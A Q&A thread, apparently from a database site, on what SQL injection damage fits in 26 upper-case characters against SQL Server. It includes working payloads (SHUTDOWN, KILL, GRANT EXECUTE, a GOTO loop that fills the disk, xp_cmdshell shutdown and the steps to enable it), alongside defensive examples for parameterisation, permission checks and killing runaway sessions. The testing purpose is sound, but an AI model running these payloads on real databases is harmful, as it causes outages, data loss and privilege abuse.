
I'm testing for resilience against injection attacks on an SQL Server database.

All table names in the db are lower case, and the collation is case-sensitive, Latin1_General_CS_AS.

The string I can send in is forced to uppercase, and can be a maximum of 26 characters in length. So I can't send in a DROP TABLE because the table name would be in uppercase and thus the statement would fail due to the collation.

So - what's the maximum damage I could do in 26 characters?

EDIT

I know all about parameterised queries and so forth - let's imagine that the person who developed the front end that builds the query to send in didn't use params in this case.

I'm also not trying to do anything nefarious, this is a system built by somebody else in the same organisation.

Alan B
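
A stand-in for the front end described above, added here as an example and not part of the original question: a procedure that upper-cases the caller's string, caps it at 26 characters and then concatenates it into a query, next to the same procedure written with sp_executesql. The table t, the procedure names and the test strings are assumptions; run it in a database created with COLLATE Latin1_General_CS_AS so identifier case sensitivity matches the question.

```sql
-- Added example (not from the original post). Run in a database whose collation
-- is Latin1_General_CS_AS so that object names are case-sensitive.
CREATE TABLE t (c char(99));            -- lower-case name, as in the question
INSERT t VALUES ('ALAN');
GO

-- The flawed front end: forces upper case, caps at 26 characters, then concatenates.
CREATE PROCEDURE dbo.vulnerable_search @input nvarchar(100)
AS
BEGIN
    DECLARE @s nvarchar(26) = UPPER(LEFT(@input, 26));
    DECLARE @sql nvarchar(300) = N'SELECT c FROM t WHERE c = ''' + @s + N'''';
    PRINT @sql;                          -- shows the statement the engine actually sees
    EXEC (@sql);
END
GO

-- Same constraints, but the value travels as a parameter and can never become code.
CREATE PROCEDURE dbo.safe_search @input nvarchar(100)
AS
BEGIN
    DECLARE @s nvarchar(26) = UPPER(LEFT(@input, 26));
    EXEC sp_executesql N'SELECT c FROM t WHERE c = @p',
                       N'@p nvarchar(26)', @p = @s;
END
GO

EXEC dbo.vulnerable_search 'Alan';                   -- legitimate call, returns one row
EXEC dbo.vulnerable_search '''; drop table t--';     -- runs as DROP TABLE T: fails, no object T
EXEC dbo.vulnerable_search '''; select @@version--'; -- 20 chars, no identifiers: injection works
EXEC dbo.safe_search       '''; select @@version--'; -- treated as a literal, returns no rows
```

The second call shows the collation constraint from the question doing its job, and the third shows why that is not a defence: any payload made only of keywords, functions and punctuation is unaffected by upper-casing. The PRINT line is there so you can see exactly what reaches the engine when trying further payloads.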

6 Answers


Easy:

GRANT EXECUTE TO LowlyDBA

Or, I guess in this case it'd be

grant execute to lowlydba 

Take your pick of variations on this.

In all likelihood you may be able to test this now against your current system, but any number of small changes in the database over time could invalidate your testing. The character string could change, someone could create a lower case stored procedure that has destructive potential - anything. You can never say with 100% confidence that there isn't a destructive 26 character attack someone could construct.

I suggest you find a way to make the developer follow basic industry standard best security practices, if only for your own sake as someone who I presume is at least partially responsible should security breaches happen.

Edit:

And for maliciousness/fun, you could try enabling every trace flag. This would be interesting to observe. Feels like a blog post Brent Ozar would make...

DBCC TRACEON(xxxx, -1)

LowlyDBA - John M

The SHUTDOWN command or KILL command (pick a random number over 50) both take significantly less than 26 characters, though the account executing the application queries hopefully doesn't have sufficient permissions to run these.

Martin Smith
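
Whether SHUTDOWN or KILL is reachable depends entirely on what the application's principal holds, so the check worth running is this, added here as an example and not part of the answer above. It assumes a login named app_login that is mapped to a user in the current database, and must be run by someone with sysadmin (or IMPERSONATE on that login).

```sql
-- Added example (not from the original answer): what can the application's
-- principal actually do? app_login is a hypothetical login name.
EXECUTE AS LOGIN = 'app_login';

-- Server-level permissions behind the short destructive statements
SELECT
    HAS_PERMS_BY_NAME(NULL, NULL, 'SHUTDOWN')             AS can_shutdown,    -- SHUTDOWN
    HAS_PERMS_BY_NAME(NULL, NULL, 'ALTER ANY CONNECTION') AS can_kill,        -- KILL <spid>
    HAS_PERMS_BY_NAME(NULL, NULL, 'ALTER SETTINGS')       AS can_reconfigure, -- sp_configure / RECONFIGURE
    IS_SRVROLEMEMBER('sysadmin')                          AS is_sysadmin;     -- DBCC TRACEON, xp_cmdshell

-- Database-level permissions behind the CREATE TABLE and GRANT EXECUTE payloads
SELECT permission_name
FROM fn_my_permissions(NULL, 'DATABASE')
WHERE permission_name IN ('CREATE TABLE', 'ALTER', 'CONTROL', 'EXECUTE');

REVERT;
```

Every column in the first result should be 0 and the second result should be empty for a login that only runs the application's own queries; anything else is the list of 26-character payloads that would actually succeed.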

You could create a table that you then fill up until the end of time or disk space runs out, whichever comes first.

declare @S char(26);

set @S = 'create table t(c char(99))';   -- exactly 26 characters
exec (@S);

set @S = 'insert t values('''')'         -- seed a single row
exec (@S);

set @S = 'insert t select c from t'      -- each execution doubles the row count
exec (@S);
exec (@S);
exec (@S);
exec (@S);
-- etc
Mikael Eriksson

Depending on your definition of damage, you could run this:

WAITFOR DELAY '23:59'

To be truly evil, you could use a load-testing tool to run that from 32,768 clients.

user143642

Variation based on @MikaelEriksson's answer and @MartinSmith's reply to my initial comment:

declare @S char(26);

set @S = 'create table t(i int)';   -- table t, which the inserts below target
exec (@S);

Initially I had tried to do a WHILE statement, but the best I could do was 27 characters:

set @S = 'while 1=1 insert t select 0'; -- fails at 27 characters
exec (@S);

But Martin pointed out GOTO:

set @S = 'x:insert t select 0 GOTO x';
exec (@S);

GOTO... the root of all evil and creator of an infinite-loop insert statement in 26 characters.

With that said... it might be advantageous to stick with CHAR(99) instead of int as that would use more space. Other options either use longer names and would smash the 26 character limit... or use less storage space per row.

Full Test Code:

declare @S char(26);
set @S = 'drop table t;';
exec (@S);
GO

declare @S char(26);

set @S = 'create table t(c CHAR(99))';
exec (@S);

set @S = 'x:insert t select 0 GOTO x';
exec (@S);
GO
WernerCD
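
The flip side of the GOTO loop is finding and stopping it once it is running. The following is added as an example and is not part of the answer above; it assumes the application connects as a login named app_login (hypothetical) and that the table being filled is t.

```sql
-- Added example (not from the original answer): locate the session running an
-- injected loop and stop it. app_login is a hypothetical login name.
SELECT r.session_id, s.login_name, s.program_name, r.status, r.command,
       r.total_elapsed_time / 1000 AS elapsed_s, r.cpu_time / 1000 AS cpu_s,
       SUBSTRING(st.text, 1, 200) AS batch_text   -- for EXEC(@S) this is the injected string
FROM sys.dm_exec_requests AS r
JOIN sys.dm_exec_sessions AS s ON s.session_id = r.session_id
CROSS APPLY sys.dm_exec_sql_text(r.sql_handle) AS st
WHERE s.is_user_process = 1
  AND s.login_name = 'app_login'
  AND r.total_elapsed_time > 60000;              -- running for longer than a minute

-- How much space the loop has consumed so far
EXEC sp_spaceused 't';

-- Terminate the longest-running request from that login. KILL needs ALTER ANY
-- CONNECTION and does not accept a variable, so the statement is built as a string.
DECLARE @sid int = (
    SELECT TOP (1) r.session_id
    FROM sys.dm_exec_requests AS r
    JOIN sys.dm_exec_sessions AS s ON s.session_id = r.session_id
    WHERE s.login_name = 'app_login' AND r.total_elapsed_time > 60000
    ORDER BY r.total_elapsed_time DESC);
IF @sid IS NOT NULL
BEGIN
    DECLARE @cmd nvarchar(20) = N'KILL ' + CAST(@sid AS nvarchar(10));
    EXEC (@cmd);
END
```

Because each INSERT in the loop is its own autocommit transaction, KILL has almost nothing to roll back, but the rows already written stay in t and have to be cleaned up separately. Filtering on login and elapsed time rather than on the batch text keeps the query useful against payloads that do not happen to contain GOTO.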

XP_CMDSHELL 'SHUTDOWN -PF'

Depending on how damaging you consider a power-down to be. :-)

This does require xp_cmdshell to be enabled on the server, something that is not the case by default for the last few versions of SQL Server. It also requires that the service account have the shutdown right, which it may or may not have.

Enabling xp_cmdshell probably goes outside your 26 character limit. Would you allow multiple injections?

SP_CONFIGURE 'SHOW ADV',1

RECONFIGURE

SP_CONFIGURE 'XP', 1

RECONFIGURE
Greenstone Walker